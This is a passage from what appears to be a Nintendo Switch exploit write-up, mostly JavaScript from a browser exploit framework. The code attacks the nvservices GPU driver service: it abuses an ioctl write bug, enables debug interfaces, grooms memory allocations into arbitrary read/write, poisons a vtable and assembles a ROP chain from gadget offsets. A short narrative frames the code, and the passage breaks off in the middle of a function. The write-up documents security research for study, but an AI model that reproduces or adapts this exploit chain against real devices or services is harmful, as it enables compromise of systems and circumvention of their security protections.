The first idea I came up with was to try coping with the unreliable contents of the semi-arbitrary write from NVGPU_GPU_IOCTL_WAIT_FOR_PAUSE and just corrupt different objects that I could see inside the leaked transfer memory region. This had very limited results and led nowhere.
Luckily, by now, plutoo, derrek, naehrwert and yellows8 succeeded in exploiting the Switch using a top-down approach: the famous glitch attack than went on to be presented at 34C3. So, with the actual nvservices binary now in hand, we could finally plan a proper exploit chain.

Working with plutoo, we found out that other ioctl commands could change the stack contents semi-predictably and we came up with this:

sploitcore.prototype.break_nvdrv = function(sm_handle) {
var meminfo = this.malloc(0x20);
var pageinfo = this.malloc(0x8);
// Leak nvservices base address
var nvdrv_base = this.get_nvdrv_base(sm_handle);
// Forge a new service handle for NVDRV
var srv_handle = this.forge_handle(sm_handle, "nvdrv:t");
// Initialize NVDRV
var init_res = this.nvdrv_init(srv_handle, 0x300000, 0, 0);
var nvdrv_buf = init_res[0];
var mem_addr = init_res[1];
// Open "/dev/nvhost-ctrl-gpu"
var ctrlgpu_dev_handle = this.nvdrv_open(nvdrv_buf, "/dev/nvhost-ctrl-gpu");
// Open "/dev/nvhost-as-gpu"
var as_dev_handle = this.nvdrv_open(nvdrv_buf, "/dev/nvhost-as-gpu");
// Open "/dev/nvmap"
var nvmap_dev_handle = this.nvdrv_open(nvdrv_buf, "/dev/nvmap");
// Open "/dev/nvhost-ctrl"
var ctrl_dev_handle = this.nvdrv_open(nvdrv_buf, "/dev/nvhost-ctrl");
// Open "/dev/nvhost-gpu"
var gpu_dev_handle = this.nvdrv_open(nvdrv_buf, "/dev/nvhost-gpu");
// Open "/dev/nvdisp-disp0"
var disp_dev_handle = this.nvdrv_open(nvdrv_buf, "/dev/nvdisp-disp0");
// Leak pointer from nvmap
var sharedmem_ptr = this.nvdrv_sharedmem_leak(nvdrv_buf, nvmap_dev_handle);
// Create new nvmap handle
var nvmap_handle = this.nvmap_alloc(nvdrv_buf, nvmap_dev_handle, [0, 0], 0x10000);
// Initialize a new NVGPU unit
this.nvdrv_init_gpu(nvdrv_buf, gpu_dev_handle, as_dev_handle, nvmap_dev_handle, nvmap_handle);
// Disable SM stopping
this.nvdrv_disable_sm_stop(nvdrv_buf, ctrlgpu_dev_handle, gpu_dev_handle);
// Setup write targets
var spray_ptr = utils.add2(nvdrv_base, 0xB4DB4);
var target_ptr0 = utils.add2(nvdrv_base, 0x63AFD1);
var target_ptr1 = utils.add2(nvdrv_base, 0x111618 - 0x18);
// Overwrite RMOS_SET_PRODUCTION_MODE to enable debug features
this.nvdrv_wait_for_pause(nvdrv_buf, ctrlgpu_dev_handle, target_ptr0, 0x01);
// Submit GPFIFO to plant data in shared memory
// Contents will be at sharedmem_ptr + 0x31000
this.nvdrv_submit_gpfifo(nvdrv_buf, gpu_dev_handle, utils.add2(nvdrv_base, 0xC4D5C)); // Pointer to SVC 0x55
this.nvdrv_submit_gpfifo(nvdrv_buf, gpu_dev_handle, [0x00000000, 0x00000000]); // Must be NULL
this.nvdrv_submit_gpfifo(nvdrv_buf, gpu_dev_handle, [0x42424242, 0x42424242]);
this.nvdrv_submit_gpfifo(nvdrv_buf, gpu_dev_handle, [0x00001000, 0x00000000]); // SVC 0x55 X2 (io_map_size)
this.nvdrv_submit_gpfifo(nvdrv_buf, gpu_dev_handle, utils.add2(nvdrv_base, 0xBB384)); // Pointer to memcpy (RET)
this.nvdrv_submit_gpfifo(nvdrv_buf, gpu_dev_handle, [0x42424242, 0x42424242]);
this.nvdrv_submit_gpfifo(nvdrv_buf, gpu_dev_handle, utils.add2(nvdrv_base, 0xB4DB4)); // Pointer to stack pivot
this.nvdrv_submit_gpfifo(nvdrv_buf, gpu_dev_handle, [0x00000000, 0x00000000]); // Must be NULL
this.nvdrv_submit_gpfifo(nvdrv_buf, gpu_dev_handle, [0x42424242, 0x42424242]);
this.nvdrv_submit_gpfifo(nvdrv_buf, gpu_dev_handle, [0x42424242, 0x42424242]);
// Open "/dev/nvhost-dbg-gpu"
var dbg_dev_handle = this.nvdrv_open(nvdrv_buf, "/dev/nvhost-dbg-gpu");
// Bind debugger to a GPU channel
this.nvdrv_dbg_bind(nvdrv_buf, dbg_dev_handle, gpu_dev_handle);
// Overwrite dbg-gpu funcptr
this.nvdrv_zbc_query_table(nvdrv_buf, ctrlgpu_dev_handle, spray_ptr);
this.nvdrv_wait_for_pause(nvdrv_buf, ctrlgpu_dev_handle, target_ptr1, 0x01);
// Do ROP
this.nvdrv_do_rop(nvdrv_buf, dbg_dev_handle, nvdrv_base, sharedmem_ptr);
// Close the handle
this.svc(0x16, [srv_handle], false);
// Set dummy memory state
var mem_state = [0x00, 0x01];
// Wait for nvservices to release memory
while (mem_state[1])
{
// Call QueryMem
this.svc(0x06, [meminfo, pageinfo, mem_addr], false);
// Read state
mem_state = this.read8(meminfo, 0x10 >> 2);
}
// Dump memory
this.memdump(utils.add2(mem_addr, 0x2D000), 0x30, "memdumps/nvmem.bin");
this.free(meminfo);
this.free(pageinfo);
}
As you can see, we use the NVGPU_GPU_IOCTL_WAIT_FOR_PAUSE bug as-is (due to the last byte being almost always 0) to overwrite the RMOS_SET_PRODUCTION_MODE flag. This allows the browser to access the debug only /dev/nvhost-dbg-gpu and /dev/nvhost-prof-gpu device interfaces and use previously inaccessible ioctl commands.
This was particularly useful to gain access to NVGPU_DBG_GPU_IOCTL_REG_OPS which could be used to plant a nice ROP chain inside the transfer memory. However, pivoting the stack still required some level of control over the stack contents for the NVGPU_GPU_IOCTL_WAIT_FOR_PAUSE bug to work.
Many other similar methods can be used as well, but this always ended up with the same issue: the NVGPU_GPU_IOCTL_WAIT_FOR_PAUSE bug was just too unreliable.

Some weeks pass and SciresM comes up with an insane yet brilliant way of exploiting this:

/*
nvhax exploit
*/
// Global nvservices exploit context
sploitcore.prototype.nvdrv_exp_ctx = {};
sploitcore.prototype.spawn_nvdrv_srv = function(sm_handle, transf_mem_addr, transf_mem_size) {
// Forge a new service handle for NVDRV
var srv_handle = this.forge_handle(sm_handle, "nvdrv:t");
// Initialize NVDRV
var init_res = this.nvdrv_init(srv_handle, transf_mem_size, 0, transf_mem_addr);
var nvdrv_buf = init_res[0];
var mem_addr = init_res[1];
// Open "/dev/nvhost-gpu"
var gpu_dev_handle = this.nvdrv_open(nvdrv_buf, "/dev/nvhost-gpu");
return [srv_handle, nvdrv_buf, mem_addr, gpu_dev_handle];
}
sploitcore.prototype.destroy_nvdrv_srv = function(sm_handle, srv_handle, mem_addr, meminfo, pageinfo) {
// Close the handle
this.svc(0x16, [srv_handle], false);
// Set dummy memory state
var mem_state = [0x00, 0x01];
// Wait for nvservices to release memory
while (mem_state[1])
{
// Call QueryMem
this.svc(0x06, [meminfo, pageinfo, mem_addr], false);
// Read state
mem_state = this.read8(meminfo, 0x10/4);
}
}
sploitcore.prototype.leak_nvdrv_srv = function(sm_handle, mem_size, meminfo, pageinfo) {
// Spawn leaker service
var nvdrv_res = this.spawn_nvdrv_srv(sm_handle, 0, 0x100000);
var srv_handle = nvdrv_res[0];
var nvdrv_buf = nvdrv_res[1];
var mem_addr = nvdrv_res[2];
// Destroy leaker service
this.destroy_nvdrv_srv(sm_handle, srv_handle, mem_addr, meminfo, pageinfo);
// Leak out base address
var nvmem_base_addr = this.read8(mem_addr, 0x8008/4);
if (mem_size == 0x01)
nvmem_base_addr = utils.add2(nvmem_base_addr, -0x8000);
else if (mem_size == 0x08)
nvmem_base_addr = utils.add2(nvmem_base_addr, -0xC000);
else if (mem_size == 0x40)
nvmem_base_addr = utils.add2(nvmem_base_addr, -0x2B000);
this.free(mem_addr);
return nvmem_base_addr;
}
sploitcore.prototype.install_nvdrv_rw = function() {
var sm_handle = this.nvdrv_exp_ctx[0];
var meminfo = this.malloc(0x40);
var pageinfo = this.malloc(0x10);
// Spawn first service
var nvdrv_obj0 = this.spawn_nvdrv_srv(sm_handle, 0, 0x100000);
var obj0_srv_handle = nvdrv_obj0[0];
var obj0_nvdrv_buf = nvdrv_obj0[1];
var obj0_mem_addr = nvdrv_obj0[2];
var obj0_gpu_dev_handle = nvdrv_obj0[3];
// Open "/dev/nvhost-gpu"
var gpu_dev_handle = this.nvdrv_open(obj0_nvdrv_buf, "/dev/nvhost-gpu");
// Destroy first service
this.destroy_nvdrv_srv(sm_handle, obj0_srv_handle, obj0_mem_addr, meminfo, pageinfo);
// Find the nvhost channel's address
var nvhost_channel_addr = this.read8(obj0_mem_addr, 0xC000/4);
utils.log('nvhost_channel_addr: ' + utils.paddr(nvhost_channel_addr));
this.free(obj0_mem_addr);
// Spawn second service
var nvdrv_obj1 = this.spawn_nvdrv_srv(sm_handle, 0, 0x100000);
var nvdrv_obj1_addr = this.leak_nvdrv_srv(sm_handle, 1, meminfo, pageinfo);
var obj1_srv_handle = nvdrv_obj1[0];
var obj1_nvdrv_buf = nvdrv_obj1[1];
var obj1_mem_addr = nvdrv_obj1[2];
var obj1_gpu_dev_handle = nvdrv_obj1[3];
utils.log('nvdrv_obj1_addr: ' + utils.paddr(nvdrv_obj1_addr));
// Set dummy address for obj1
this.nvdrv_gpu_set_user_addr(obj1_nvdrv_buf, obj1_gpu_dev_handle, [0x12345678, 0x87654321]);
var malTries = 0;
var malBuf = this.malloc(0x4000000);
var malBase;
this.write4(0x41424344, malBuf, 0x80/4);
// Craft transfer memory
for (var i = 0x50000; i < 0x4000000; i += 0x10000) {
var hwctx = utils.add2(nvdrv_obj1_addr, 0);
var rwaddr = utils.add2(nvdrv_obj1_addr, 0xC008 - 0x78);
this.write4(nvhost_channel_addr[0], malBuf, (0x00 + i)/4);
this.write4(nvhost_channel_addr[1], malBuf, (0x04 + i)/4);
this.write4(rwaddr[0], malBuf, (0x08 + i)/4);
this.write4(rwaddr[1], malBuf, (0x0C + i)/4);
}
// Do 64MB allocations until high byte is 00
while (true) {
var nvdrv_obj2 = this.spawn_nvdrv_srv(sm_handle, malBuf, 0x4000000);
var obj2_srv_handle = nvdrv_obj2[0];
var obj2_nvdrv_buf = nvdrv_obj2[1];
var obj2_mem_addr = nvdrv_obj2[2];
var obj2_gpu_dev_handle = nvdrv_obj2[3];
malBase = this.leak_nvdrv_srv(sm_handle, 0x40, meminfo, pageinfo);
malTries++;
utils.log('Allocated 64MB at ' + utils.paddr(malBase));
if (malBase[1] == 0 && malBase[0] <= 0xfc000000)
break;
this.destroy_nvdrv_srv(sm_handle, obj2_srv_handle, obj2_mem_addr, meminfo, pageinfo);
this.free(obj2_mem_addr);
}
utils.log('Final malobj at ' + utils.paddr(malBase) + ' after ' + malTries + ' tries');
var loBound = malBase[0] + 0x50000 - 0x10000;
var hiBound = malBase[0] + 0x4000000 - 0x20000;
var vicTries = 0;
var vicBuf = this.malloc(0x800000);
var vicBase;
// Force GC
this.gc();
// Do 8MB allocations until it overlaps
while (true) {
var nvdrv_obj3 = this.spawn_nvdrv_srv(sm_handle, vicBuf, 0x800000);
var obj3_srv_handle = nvdrv_obj3[0];
var obj3_nvdrv_buf = nvdrv_obj3[1];
var obj3_mem_addr = nvdrv_obj3[2];
var obj3_gpu_dev_handle = nvdrv_obj3[3];
vicBase = this.leak_nvdrv_srv(sm_handle, 0x08, meminfo, pageinfo);
vicTries++;
utils.log('Allocated 8MB at ' + utils.paddr(vicBase));
if (vicBase[0] >= loBound && vicBase[0] < hiBound)
break;
this.destroy_nvdrv_srv(sm_handle, obj3_srv_handle, obj3_mem_addr, meminfo, pageinfo);
this.free(obj3_mem_addr);
}
var rop_base = utils.add2(vicBase, 0x400000);
utils.log('Final malobj at ' + utils.paddr(malBase) + ' after ' + malTries + ' tries');
utils.log('Final vicobj at ' + utils.paddr(vicBase) + ' after ' + vicTries + ' tries');
utils.log('Target object at ' + utils.paddr([vicBase[0] + 0x10000, 0]));
utils.log('Offset + 0x' + (vicBase[0] - malBase[0]).toString(16));
// Spawn last object
var nvdrv_obj4 = this.spawn_nvdrv_srv(sm_handle, 0, 0x100000);
var obj4_srv_handle = nvdrv_obj4[0];
var obj4_nvdrv_buf = nvdrv_obj4[1];
var obj4_mem_addr = nvdrv_obj4[2];
var obj4_gpu_dev_handle = nvdrv_obj4[3];
// Open "/dev/nvhost-ctrl-gpu"
var gpu_ctrl_dev_handle = this.nvdrv_open(obj4_nvdrv_buf, "/dev/nvhost-ctrl-gpu");
// Overwrite pointer with 00
var target_addr = utils.add2(vicBase, 0xF000 + 4);
this.nvdrv_wait_for_pause(obj4_nvdrv_buf, gpu_ctrl_dev_handle, target_addr, 0x01);
// Read back the user address of obj3
var user_addr = this.nvdrv_gpu_get_user_addr(obj3_nvdrv_buf, obj3_gpu_dev_handle);
utils.log('user addr ' + utils.paddr(user_addr));
// Write obj2's address into forged buffer
var test_addr_lo = malBase[0] + 0x80 - 0x78;
var test_addr_hi = malBase[1];
this.nvdrv_gpu_set_user_addr(obj3_nvdrv_buf, obj3_gpu_dev_handle, [test_addr_lo, test_addr_hi]);
// Read back from forged buffer
user_addr = this.nvdrv_gpu_get_user_addr(obj1_nvdrv_buf, obj1_gpu_dev_handle);
utils.log('user addr ' + utils.paddr(user_addr));
// Free memory
this.free(meminfo);
this.free(pageinfo);
// Initialize RW context
this.nvdrv_exp_ctx[2] = obj3_nvdrv_buf;
this.nvdrv_exp_ctx[3] = obj3_gpu_dev_handle;
this.nvdrv_exp_ctx[4] = obj1_nvdrv_buf;
this.nvdrv_exp_ctx[5] = obj1_gpu_dev_handle;
this.nvdrv_exp_ctx[6] = rop_base;
}
sploitcore.prototype.read_nvdrv_mem = function(mem_addr) {
// Unwrap RW context
var obj0_nvdrv_buf = this.nvdrv_exp_ctx[2];
var obj0_gpu_dev_handle = this.nvdrv_exp_ctx[3];
var obj1_nvdrv_buf = this.nvdrv_exp_ctx[4];
var obj1_gpu_dev_handle = this.nvdrv_exp_ctx[5];
var mem_addr_ptr = utils.add2(mem_addr, -0x78);
var mem_addr_ptr_lo = mem_addr_ptr[0];
var mem_addr_ptr_hi = mem_addr_ptr[1];
// Set the target address
this.nvdrv_gpu_set_user_addr(obj0_nvdrv_buf, obj0_gpu_dev_handle, [mem_addr_ptr_lo, mem_addr_ptr_hi]);
// Read the data
var nvdrv_mem = this.nvdrv_gpu_get_user_addr(obj1_nvdrv_buf, obj1_gpu_dev_handle);
return [nvdrv_mem[0], nvdrv_mem[1]];
}
sploitcore.prototype.write_nvdrv_mem = function(mem_addr, mem_val) {
// Unwrap RW context
var obj0_nvdrv_buf = this.nvdrv_exp_ctx[2];
var obj0_gpu_dev_handle = this.nvdrv_exp_ctx[3];
var obj1_nvdrv_buf = this.nvdrv_exp_ctx[4];
var obj1_gpu_dev_handle = this.nvdrv_exp_ctx[5];
var mem_addr_ptr = utils.add2(mem_addr, -0x78);
var mem_addr_ptr_lo = mem_addr_ptr[0];
var mem_addr_ptr_hi = mem_addr_ptr[1];
// Set the target address
this.nvdrv_gpu_set_user_addr(obj0_nvdrv_buf, obj0_gpu_dev_handle, [mem_addr_ptr_lo, mem_addr_ptr_hi]);
// Write the data
var mem_val_lo = mem_val[0];
var mem_val_hi = mem_val[1];
this.nvdrv_gpu_set_user_addr(obj1_nvdrv_buf, obj1_gpu_dev_handle, [mem_val_lo, mem_val_hi]);
}
sploitcore.prototype.build_nvdrv_rop = function(nvdrv_base) {
var nvdrv_base = this.nvdrv_exp_ctx[1];
var rop_base = this.nvdrv_exp_ctx[6];
var rop_buf = utils.add2(rop_base, 0x80000);
utils.log('rop_buf: '+ utils.paddr(rop_buf));
// Gadgets
var channel_to_base = utils.add2(nvdrv_base, 0x61d910);
var store_return_branch_a8 = utils.add2(nvdrv_base, 0x2234);
var br_38 = utils.add2(nvdrv_base, 0x7F174);
var add_x8_br_x2 = utils.add2(nvdrv_base, 0xBFFF0);
var add_x8_adj = 0x608;
var ldr_blr_x9 = utils.add2(nvdrv_base, 0x7B20C);
var partial_load = utils.add2(nvdrv_base, 0xB4DAC);
var shuffle_x0_x8 = utils.add2(nvdrv_base, 0x7CCB8);
var store_branch_60 = utils.add2(nvdrv_base, 0x2E6CC);
var ldr_br_x1 = utils.add2(nvdrv_base, 0x2244);
var save = utils.add2(nvdrv_base, 0xB2328);
var ldr_x0_ret = utils.add2(nvdrv_base, 0xC180C);
var load = utils.add2(nvdrv_base, 0xB4D74);
var br_x16 = utils.add2(nvdrv_base, 0x334);
var ldr_x19_ret = utils.add2(nvdrv_base, 0x7635C);
var str_x20 = utils.add2(nvdrv_base, 0x8890);
var str_x8_x19 = utils.add2(nvdrv_base, 0x40224);
var str_x0_x19 = utils.add2(nvdrv_base, 0x47154);
var str_x2_x19 = utils.add2(nvdrv_base, 0x4468C);
var ldr_x8_str_0_x19 = utils.add2(nvdrv_base, 0xBDFB8);
var blr_x8_ret = utils.add2(nvdrv_base, 0xF07C);
var ldr_x2_str_x1_x2 = utils.add2(nvdrv_base, 0x11B18);
var ldr_x8_ldr_X1_br_x1 = utils.add2(nvdrv_base, 0x7CDB0);
var refresh_x19_x20 = utils.add2(nvdrv_base, 0x7D0);
var magic_copy_fuckery = utils.add2(nvdrv_base, 0xE548);
var return_address = utils.add2(nvdrv_base, 0x46B0);
// Pointers
var vtable = utils.add2(rop_buf, 0x1000);
var vtable2 = utils.add2(rop_buf, 0x2000);
var pl_buf1 = utils.add2(rop_buf, 0x3000);
var pl_buf2 = utils.add2(rop_buf, 0x4000);
var save_buf = utils.add2(rop_buf, 0x6000);
var store_sp = utils.add2(rop_buf, 0x7000);
var vtable_save = utils.add2(rop_buf, 0x8000);
var load_buf = utils.add2(rop_buf, 0x9000);
var sp = utils.add2(rop_buf, 0x20000);
this.write_nvdrv_mem(rop_buf, vtable);
this.write_nvdrv_mem(utils.add2(vtable, 0x08), store_return_branch_a8);
this.write_nvdrv_mem(utils.add2(vtable, 0x28), store_return_branch_a8);
this.write_nvdrv_mem(utils.add2(vtable, 0x38), add_x8_br_x2);
this.write_nvdrv_mem(utils.add2(vtable, 0xA8), br_38);
this.write_nvdrv_mem(utils.add2(vtable, add_x8_adj), pl_buf1);
this.write_nvdrv_mem(utils.add2(vtable, add_x8_adj + 8), ldr_blr_x9);
this.write_nvdrv_mem(utils.add2(vtable, add_x8_adj + 0xF8), utils.add2(store_sp, 0x10));
this.write_nvdrv_mem(utils.add2(vtable, add_x8_adj + 0x100), br_38);
this.write_nvdrv_mem(pl_buf1, vtable2);
this.write_nvdrv_mem(utils.add2(pl_buf1, 8), partial_load);
this.write_nvdrv_mem(vtable2, pl_buf2);
this.write_nvdrv_mem(utils.add2(vtable2, 0x38), shuffle_x0_x8);
this.write_nvdrv_mem(pl_buf2, save_buf);
this.write_nvdrv_mem(utils.add2(save_buf, 0x28), store_branch_60);
this.write_nvdrv_mem(utils.add2(pl_buf2, 0x60), partial_load);
this.write_nvdrv_mem(utils.add2(pl_buf2, 0xF8), sp);
this.write_nvdrv_mem(utils.add2(pl_buf2, 0x100), ldr_br_x1);
this.write_nvdrv_mem(save_buf, vtable_save);
this.write_nvdrv_mem(vtable_save, save);
this.write_nvdrv_mem(utils.add2(sp, 0x8), ldr_x0_ret);
sp = utils.add2(sp, 0x10);
// Save
this.write_nvdrv_mem(utils.add2(sp, 0x08), load_buf);
this.write_nvdrv_mem(utils.add2(sp, 0x18), load);
sp = utils.add2(sp, 0x20);
this.write_nvdrv_mem(utils.add2(sp, 0x08), ldr_x19_ret);
sp = utils.add2(sp, 0x10);
// Cleanup
var hax_buf = utils.add2(rop_buf, 0x10000);
var dump_buf = utils.add2(rop_buf, 0x11000);
this.write_nvdrv_mem(utils.add2(sp, 0x00), utils.add2(hax_buf, -0x1A8));
this.write_nvdrv_mem(utils.add2(sp, 0x18), str_x20);
sp = utils.add2(sp, 0x20);
this.write_nvdrv_mem(utils.add2(sp, 0x08), utils.add2(hax_buf, -0x8));
this.write_nvdrv_mem(utils.add2(sp, 0x18), str_x8_x19);
sp = utils.add2(sp, 0x20);
this.write_nvdrv_mem(utils.add2(sp, 0x00), utils.add2(hax_buf, 0x10));
this.write_nvdrv_mem(utils.add2(sp, 0x18), str_x0_x19);
sp = utils.add2(sp, 0x20);
this.write_nvdrv_mem(utils.add2(sp, 0x00), utils.add2(hax_buf, -0x90));
this.write_nvdrv_mem(utils.add2(sp, 0x18), str_x2_x19);
sp = utils.add2(sp, 0x20);
this.write_nvdrv_mem(utils.add2(sp, 0x08), utils.add2(hax_buf, 0x100));
this.write_nvdrv_mem(utils.add2(sp, 0x18), ldr_x8_str_0_x19);
sp = utils.add2(sp, 0x20);
this.write_nvdrv_mem(utils.add2(sp, 0x08), ldr_x2_str_x1_x2);
this.write_nvdrv_mem(utils.add2(sp, 0x28), blr_x8_ret);
sp = utils.add2(sp, 0x30);
this.write_nvdrv_mem(utils.add2(sp, 0x00), utils.add2(hax_buf, 0x20));
sp = utils.add2(sp, 0x10);
this.write_nvdrv_mem(utils.add2(sp, 0x8), ldr_x0_ret);
sp = utils.add2(sp, 0x10);
this.write_nvdrv_mem(utils.add2(sp, 0x08), dump_buf);
this.write_nvdrv_mem(utils.add2(sp, 0x18), ldr_x8_ldr_X1_br_x1);
sp = utils.add2(sp, 0x20);
this.write_nvdrv_mem(dump_buf, dump_buf);
this.write_nvdrv_mem(utils.add2(dump_buf, 0x8), save);
this.write_nvdrv_mem(utils.add2(sp, 0x18), ldr_x0_ret);
sp = utils.add2(sp, 0x20);
this.write_nvdrv_mem(utils.add2(sp, 0x08), save_buf);
this.write_nvdrv_mem(utils.add2(sp, 0x18), refresh_x19_x20);
sp = utils.add2(sp, 0x20);
this.write_nvdrv_mem(utils.add2(sp, 0x0), utils.add2(utils.add2(store_sp, 0x00), -0x70));
this.write_nvdrv_mem(utils.add2(sp, 0x8), utils.add2(utils.add2(save_buf, 0xF8), -0x08));
this.write_nvdrv_mem(utils.add2(sp, 0x18), magic_copy_fuckery);
sp = utils.add2(sp, 0x20);
// Fix SP
this.write_nvdrv_mem(utils.add2(sp, 0x70), utils.add2(utils.add2(hax_buf, 0x180), -0x70));
this.write_nvdrv_mem(utils.add2(sp, 0x78), utils.add2(utils.add2(save_buf, 0x100), -0x08));
this.write_nvdrv_mem(utils.add2(sp, 0x88), magic_copy_fuckery);
sp = utils.add2(sp, 0x90);
// Fix LR
this.write_nvdrv_mem(utils.add2(hax_buf, 0x180), return_address);
this.write_nvdrv_mem(utils.add2(sp, 0x70), utils.add2(utils.add2(hax_buf, 0x190), -0x70));
this.write_nvdrv_mem(utils.add2(sp, 0x78), utils.add2(utils.add2(save_buf, 0x0), -0x08));
this.write_nvdrv_mem(utils.add2(sp, 0x88), magic_copy_fuckery);
sp = utils.add2(sp, 0x90);
// Fix X0
this.write_nvdrv_mem(utils.add2(hax_buf, 0x188), [0xCAFE, 0x0]);
this.write_nvdrv_mem(utils.add2(sp, 0x88), load);
sp = utils.add2(sp, 0x90);
}
sploitcore.prototype.build_nvdrv_call_obj = function() {
var sm_handle = this.nvdrv_exp_ctx[0];
var nvdrv_base = this.nvdrv_exp_ctx[1];
var rop_base = this.nvdrv_exp_ctx[6];
var rop_buf = utils.add2(rop_base, 0x80000);
// Find the heap
var heap_ptr = this.read_nvdrv_mem(utils.add2(nvdrv_base, 0x5CD0D0));
var heap_magic = this.read_nvdrv_mem(heap_ptr);
if (heap_magic[0] != 0x45585048)
utils.log("Failed to find heap magic!");
else
utils.log("Heap magic found!");
var cur_recent = this.read_nvdrv_mem(utils.add2(heap_ptr, 0x80));
// Spawn call object
var nvdrv_res = this.spawn_nvdrv_srv(sm_handle, 0, 0x100000);
var call_recent = this.read_nvdrv_mem(utils.add2(heap_ptr, 0x80));
if (cur_recent[0] == call_recent[0])
utils.log("Failed to find call object!");
else
utils.log("Call object found!");
var ud_magic = this.read_nvdrv_mem(call_recent);
if (ud_magic[0] != 0x5544)
utils.log("Call object memchunk is freed!");
else
utils.log("Call object memchunk is valid!");
var call_vtable_addr = utils.add2(call_recent, 0x20);
var old_vtable = this.read_nvdrv_mem(call_vtable_addr);
var call_vtable_buf_addr = utils.add2(rop_base, 0x98000);
this.write_nvdrv_mem(call_vtable_addr, call_vtable_buf_addr);
// Copy vtable contents
for (var i = 0; i < 0x200; i += 0x8) {
var obj_temp = this.read_nvdrv_mem(utils.add2(old_vtable, i));
this.write_nvdrv_mem(utils.add2(call_vtable_buf_addr, i), obj_temp);
}
// Gadgets for vtable
var br_38 = utils.add2(nvdrv_base, 0x7F174);
var shuffle_x0_x8 = utils.add2(nvdrv_base, 0x7CCB8);
var add_x8_br_x2 = utils.add2(nvdrv_base, 0xBFFF0);
var add_x8_adj = 0x608;
// Poison vtable
this.write_nvdrv_mem(utils.add2(call_vtable_buf_addr, 0x20), br_38); // Open
this.write_nvdrv_mem(utils.add2(call_vtable_buf_addr, 0x38), add_x8_br_x2);
this.write_nvdrv_mem(utils.add2(call_vtable_buf_addr, add_x8_adj + 8), shuffle_x0_x8);
this.write_nvdrv_mem(utils.add2(call_vtable_buf_addr, add_x8_adj), rop_buf); // Poison **obj
return nvdrv_res;
}
sploitcore.prototype.do_nvdrv_memcpy_in = function(dst, src, size) {
var memcpy = this.bridge(0x44338C, types.int, types.void_p, types.void_p, types.int);
// Unwrap call context
var sm_handle = this.nvdrv_exp_ctx[0];
var tmp_buf = this.nvdrv_exp_ctx[8];
var tmp_buf_size = this.nvdrv_exp_ctx[9];
var meminfo = this.malloc(0x40);
var pageinfo = this.malloc(0x10);
// Get temp buffer address
var tmp_buf_addr = utils.add2(tmp_buf, 0x100000);
// Copy in the data
memcpy(tmp_buf_addr, src, size);
// Spawn a new object backed by the source data
var nvdrv_obj = this.spawn_nvdrv_srv(sm_handle, tmp_buf, tmp_buf_size);
var obj_srv_handle = nvdrv_obj[0];
var obj_nvdrv_buf = nvdrv_obj[1];
var obj_mem_addr = nvdrv_obj[2];
var obj_gpu_dev_handle = nvdrv_obj[3];
// Leak the new object's base address
var nvdrv_obj_base = this.leak_nvdrv_srv(sm_handle, 0x08, meminfo, pageinfo);
var nvdrv_buf = utils.add2(nvdrv_obj_base, 0x100000);
// Call nvservices memcpy
this.do_nvdrv_rop_call(0xBB1F4, [dst, nvdrv_buf, size], [], false);
// Release temporary object
this.destroy_nvdrv_srv(sm_handle, obj_srv_handle, obj_mem_addr, meminfo, pageinfo);
this.free(obj_mem_addr);
// Free memory
this.free(meminfo);
this.free(pageinfo);
}
sploitcore.prototype.do_nvdrv_memcpy_out = function(dst, src, size) {
var memcpy = this.bridge(0x44338C, types.int, types.void_p, types.void_p, types.int);
// Unwrap call context
var sm_handle = this.nvdrv_exp_ctx[0];
var tmp_buf = this.nvdrv_exp_ctx[8];
var tmp_buf_size = this.nvdrv_exp_ctx[9];
var meminfo = this.malloc(0x40);
var pageinfo = this.malloc(0x10);
// Spawn a new object backed by the source data
var nvdrv_obj = this.spawn_nvdrv_srv(sm_handle, tmp_buf, tmp_buf_size);
var obj_srv_handle = nvdrv_obj[0];
var obj_nvdrv_buf = nvdrv_obj[1];
var obj_mem_addr = nvdrv_obj[2];
var obj_gpu_dev_handle = nvdrv_obj[3];
// Leak the new object's base address
var nvdrv_obj_base = this.leak_nvdrv_srv(sm_handle, 0x08, meminfo, pageinfo);
var nvdrv_buf = utils.add2(nvdrv_obj_base, 0x100000);
// Call nvservices memcpy
this.do_nvdrv_rop_call(0xBB1F4, [nvdrv_buf, src, size], [], false);
// Release temporary object
this.destroy_nvdrv_srv(sm_handle, obj_srv_handle, obj_mem_addr, meminfo, pageinfo);
this.free(obj_mem_addr);
// Get temp buffer address
var tmp_buf_addr = utils.add2(tmp_buf, 0x100000);
// Copy out the data
memcpy(dst, tmp_buf_addr, size);
// Free memory
this.free(meminfo);
this.free(pageinfo);
}
sploitcore.prototype.do_nvdrv_rop_call = function(func_ptr, args, fargs, dump_regs) {
// Unwrap call context
var nvdrv_base = this.nvdrv_exp_ctx[1];
var rop_base = this.nvdrv_exp_ctx[6];
var call_obj = this.nvdrv_exp_ctx[7];
var tmp_buf = this.nvdrv_exp_ctx[8];
var tmp_buf_size = this.nvdrv_exp_ctx[9];
// Setup buffers
var rop_buf = utils.add2(rop_base, 0x80000);
var scratch_buf = utils.add2(rop_base, 0x30000);
if (typeof(func_ptr) == 'number')
func_ptr = utils.add2(nvdrv_base, func_ptr);
switch (arguments.length) {
case 1:
args = [];
case 2:
fargs = [];
case 3:
dump_regs = false;
}
var saddrs = {};
var scratch_offset = 0;
// Parse args
for (var i = 0; i < args.length; i++) {
if (typeof(args[i]) == 'number') {
args[i] = [args[i], 0];
} else if (ArrayBuffer.isView(args[i]) || args[i] instanceof ArrayBuffer) {
var size = args[i].byteLength;
var saddr = utils.add2(scratch_buf, scratch_offset);
this.do_nvdrv_memcpy_in(saddr, this.getArrayBufferAddr(args[i]), size);
saddrs[i] = saddr;
scratch_offset += size;
if (scratch_offset & 0x7)
scratch_offset = ((scratch_offset & 0xFFFFFFF8) + 8);
}
}
// Pointers
var vtable_save = utils.add2(rop_buf, 0x8000);
var load_buf = utils.add2(rop_buf, 0x9000);
var sp = utils.add2(rop_buf, 0x20000);
var save_buf = utils.add2(rop_buf, 0x6000);
// Gadgets
var save = utils.add2(nvdrv_base, 0xB2328);
var ldr_x0_ret = utils.add2(nvdrv_base, 0xC180C);
var load = utils.add2(nvdrv_base, 0xB4D74);
var br_x16 = utils.add2(nvdrv_base, 0x334);
var ldr_x19_ret = utils.add2(nvdrv_base, 0x7635C);
var store_branch_60 = utils.add2(nvdrv_base, 0x2E6CC);
// Write args
if (args.length > 0) {
for (var i = 0; i < 30 && i < args.length; i++) {
if (ArrayBuffer.isView(args[i]) || args[i] instanceof ArrayBuffer)
this.write_nvdrv_mem(utils.add2(load_buf, 8 * i), saddrs[i]);
else
this.write_nvdrv_mem(utils.add2(load_buf, 8 * i), args[i]);
